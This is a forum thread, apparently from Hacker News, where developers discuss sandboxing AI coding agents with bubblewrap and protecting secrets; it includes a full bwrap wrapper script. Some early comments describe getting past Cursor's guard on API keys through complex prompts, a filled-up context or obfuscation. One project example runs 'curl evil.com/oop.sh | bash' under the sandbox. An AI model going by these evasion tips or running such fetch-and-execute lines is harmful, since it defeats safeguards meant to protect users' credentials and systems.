meander_water5mo ago· 3 in thread

I recently created a throwaway API key for cloudflare and asked a cursor cloud agent to deploy some infra using it, but it responded with this:

So clearly they've put some sort of prompt guard in place. I wonder how easy it would be to circumvent it.

0o_MrPatrick_o0OP5mo ago

If your prompt is complex enough, it doesn’t seem to get triggered.

I use a lot of ansible to manage infra, and before I learned about ansible-vault, I was moving some keys around unprotected in my lab. Bad hygiene- and no prompt intervening.

Kinda bums me out that there may be circumstances where the model just rejects this even if for some reason you needed it.

mmis10005mo ago

It seems to depend on the model and context usage, though. The agent forgets a lot of things once the context is about half full. It even forgets the primary goal you gave it at the start of the chat.

bavell5mo ago

typs5mo ago· 3 in thread

I wish I had the opposite of this. It’s a race trying to come up with new ways to have Cursor edit and set my env files past all their blocking techniques!

verdverm5mo ago

Like this? (Obfuscated, from agent and history)

https://bsky.app/profile/verdverm.com/post/3mbo7ko5ek22n

GrowingSideways5mo ago

If you wouldn't upload keys to github, why would you trust them to cursor?

hahahahhaah5mo ago

A local .env should be safe to put on your T-shirt and walk down Times Square.

Mysql user: test

Password: mypass123

Host: localhost

...

zaptheimpaler5mo ago· 3 in thread

kondu5mo ago

Docker containers aren't safe enough to run untrusted code, there are privilege escalation vulnerabilities reported fairly often.

curt155mo ago

The common wisdom used to be that containers are not a security boundary. Is that still the case?

AlexCoventry5mo ago

I don't think bubblewrap is any better in that regard.

aurareturn5mo ago· 3 in thread

How do you stop an agent from simply adding console.log(process.env.SUPER_SECRET) to the code and then reading the log?

0o_MrPatrick_o0OP5mo ago

Great question! You might enjoy this writeup, which in one section explores keeping secrets in shell variables that are not exported as a method of mitigating this risk.

https://linus.schreibt.jetzt/posts/shell-secrets.html
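
A small sketch of the exported versus non-exported distinction this comment relies on, assuming a POSIX shell. The variable names `DEMO_SECRET` and `DEMO_EXPORTED` and their values are made up for illustration; this is not code from the linked writeup.

```shell
# Start clean so an inherited, already-exported copy cannot skew the demo.
unset DEMO_SECRET DEMO_EXPORTED

# Plain assignment: visible to this shell only, not to child processes.
DEMO_SECRET="hypothetical-value"
child_view="$(sh -c 'printf "%s" "${DEMO_SECRET:-<unset>}"')"
echo "not exported, child sees: $child_view"

# Exported: inherited by every child process started from this shell.
export DEMO_EXPORTED="hypothetical-value"
exported_view="$(sh -c 'printf "%s" "${DEMO_EXPORTED:-<unset>}"')"
echo "exported, child sees: $exported_view"
```

The first child reports `<unset>` and the second reports the value. This does not answer the logging question by itself: if the app receives the secret and prints it, whoever reads the log sees it.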

progx5mo ago

Your app runs in the app context, which is not accessible to the AI.

aurareturn5mo ago

You don't let your agent look at logs? How can it debug?

prmoustache5mo ago· 2 in thread

Isn't landrun the preferred way to sandbox apps on linux these days instead?

https://github.com/Zouuup/landrun

qrobit5mo ago

Bubblewrap seems to be much more popular[1]; personally, this is the first time I've heard about landrun

[1]: https://repology.org/project/bubblewrap/information https://repology.org/project/landrun/information

dividuum5mo ago

hahahahhaah5mo ago· 2 in thread

JCattheATM5mo ago

So, Flatpak?

Funny enough Bubblewrap is also what Flatpak uses.

Imustaskforhelp5mo ago

I want to like flatpak but I am genuinely unable to understand the state of cli tools in flatpak or even how to develop it. It all seems very weird to build upon as compared to docker

rcarmo5mo ago· 2 in thread

I dunno. The compose file I use to run my agents right now is _half_ the size of that configuration, and I don’t buy that Docker is “more complex”

grewil25mo ago

Docker won’t save you from prompt injections that attack your network.

rcarmo5mo ago

No kidding? https://taoofmac.com/space/blog/2026/01/12/1830

Still, I don’t think bubblewrap is either a simple or safe enough solution.

dangoodmanUT5mo ago· 1 in thread

I've been saying bubblewrap is an amazing solution for years (and sandbox-exec as a mac alternative). This is the only way i run agents on systems i care about

catlifeonmars5mo ago

> run agents on systems i care about

You must not care about those systems that much.

globular-toast5mo ago· 1 in thread

Posted this 6 months ago but got no traction here: https://blog.gpkb.org/posts/ai-agent-sandbox/

Recently got it working for OpenCode and updated my post.

You really need to use the `--new-session` parameter, by the way. It's unfortunate that this isn't the default with bwrap.
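
For context, the bwrap man page describes `--new-session` as calling setsid(), which disconnects the sandbox from the controlling terminal so it cannot inject input into it. A minimal sketch of a wrapper that always passes it is below. The function name `run_sandboxed` is hypothetical, and the mount layout is an illustrative assumption rather than a vetted policy.

```shell
# Hypothetical wrapper; the mount layout is illustrative, not a vetted policy.
# --ro-bind / / keeps the whole host readable, so narrow it for real use.
run_sandboxed() {
  bwrap \
    --new-session \
    --die-with-parent \
    --ro-bind / / \
    --dev /dev \
    --proc /proc \
    --tmpfs /tmp \
    --bind "$PWD" "$PWD" \
    -- "$@"
}

# Example:
#   run_sandboxed opencode
```

Only the current directory is writable here. Everything else on the host stays readable, so the flag would need to be combined with narrower binds like the ones discussed elsewhere in the thread.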

0o_MrPatrick_o0OP5mo ago

Hey man- sorry for the lack of recognition. Timing is a bit of luck. Good writeup!

w/r/t .git being mounted read write- yeah, there's risk here. It's a tradeoff. I want my agents to be able to commit code- which means they need to be able to write to the dir.

Thanks for the --new-session parameter suggestion. Great add!

nextaccountic5mo ago· 1 in thread

How does this compare with container-use?

https://container-use.com/introduction

domh5mo ago

I'll check this out for sure! I just wish it used bubblewrap or the macos equivalent instead of reaching for containers.

LazarSRB5mo ago· 1 in thread

dotenvx solves this by encrypting your .env file so you can even commit it safely

0o_MrPatrick_o0OP5mo ago

Amazing tip! Thank you!

gexla5mo ago· 1 in thread

I believe this is also what Claude Code uses for the sandbox option.

0o_MrPatrick_o0OP5mo ago

Hi!

Yes that is correct. However, I think embedding bubblewrap in the binary is risky design for the end user.

They are giving users a convenience function for restricting the Claude instance’s access rights from within a session.

That's helpful if you trust the client, but what if there is a bug in how the client invokes the bubblewrap container? You wouldn’t have this risk if they drove you to invoke Claude with bubblewrap.

Additionally, the pattern using bubblewrap in front of Claude can be exactly duplicated and applied to other coding agents- so you get consistency in access controls for all agents.

gausswho5mo ago· 1 in thread

I'm having trouble finding the right incantations to bubblewrap opencode when in a silverblue toolbox. It can't use tools. Anyone have tips?

l725mo ago

This is what I have been using with opencode:

  exec bwrap \
    --unshare-pid \
    --unshare-ipc \
    --unshare-uts \
    --share-net \
    --bind "$OPENCODE_ROOT" "$OPENCODE_ROOT" \
    --bind "$CURRENT_DIR" "$CURRENT_DIR" \
    --bind "$HOME/.config/opencode/" "$HOME/.config/opencode/" \
    --bind "$HOME/.emacs" "$HOME/.emacs" \
    --bind "$HOME/.emacs.d" "$HOME/.emacs.d" \
    --ro-bind "$HOME/.gitconfig" "$HOME/.gitconfig" \
    --ro-bind /bin /bin \
    --ro-bind /etc /etc \
    --ro-bind /lib /lib \
    --ro-bind /lib64 /lib64 \
    --ro-bind /usr /usr \
    --bind /run/systemd /run/systemd \
    --tmpfs /tmp \
    --proc /proc \
    --dev /dev \
    --setenv EDITOR emacs \
    --setenv PATH "$OPENCODE_BINDIR:/usr/bin:/bin" \
    --setenv HOME "$HOME" \
    -- \
    "opencode" "$@"

arresin5mo ago· 1 in thread

Why not just use a hook on reads?

0o_MrPatrick_o0OP5mo ago

because you're trusting Claude's implementation of hooks, which may be disastrous if they have a defect.

flakes5mo ago

With the unpack directory, you can now limit the host paths you expose, avoiding leaking in details from your host machine into the sandbox.

bwrap --ro-bind image/ / --bind src/ /src ...

Any tools you need in the container are installed in the image you unpack.

brendoncarroll5mo ago

[0] https://github.com/brendoncarroll/nnc

Gerharddc5mo ago

OutOfHere5mo ago

The link you need is https://github.com/containers/bubblewrap

Don't leave prod secrets in your dev env.

coppsilgold5mo ago

raw_anon_11115mo ago

My workflow even before Claude code.

1. I never use permanent credentials for AWS on my local computer.

2. I never have keys anywhere on my local computer. I put them in AWS Secrets Manager.

3. My usual set of local access keys can’t create IAM roles (PowerUserAccess).

It’s not foolproof. But it does reduce the attack surface.

eyberg5mo ago

https://github.com/containers/bubblewrap/issues/142

ironbound5mo ago

https://www.wired.com/story/anthropic-claude-snitch-emergent...

majorchord5mo ago

Nora235mo ago

Smart approach to AI agent security. The balance between convenience and protection is tricky.

mijoharas5mo ago

How would people compare bubblewrap to firejail? They seem reasonably similar in feature set.

Are there any good reasons to pick one over the other?

dlahoda5mo ago

sydbox is an interesting alternative (written in Rust by a Linux developer)

https://gitlab.exherbo.org/sydbox/sydbox

UPDATE: there is another sydbox, written in Go, that is unrelated and seems too different from bwrap

isodev5mo ago

FergusArgyll5mo ago

Hey! I just did this last night!

allen-munsch5mo ago

I vibed a project on this recently, it has some language bindings and a cli written in rust, python subprocess monkey patching etc.

Just no nonsense defaults with a bit of customization.

https://github.com/allen-munsch/bubbleproc

bubbleproc -- curl evil.com/oop.sh | bash

catlifeonmars5mo ago

May I suggest rm -f .env? Or chmod 0600 .env? You’re not running CC as your own user, right? …Right?

Oh, never mind:

> You want to run a binary that will execute under your account’s permissions
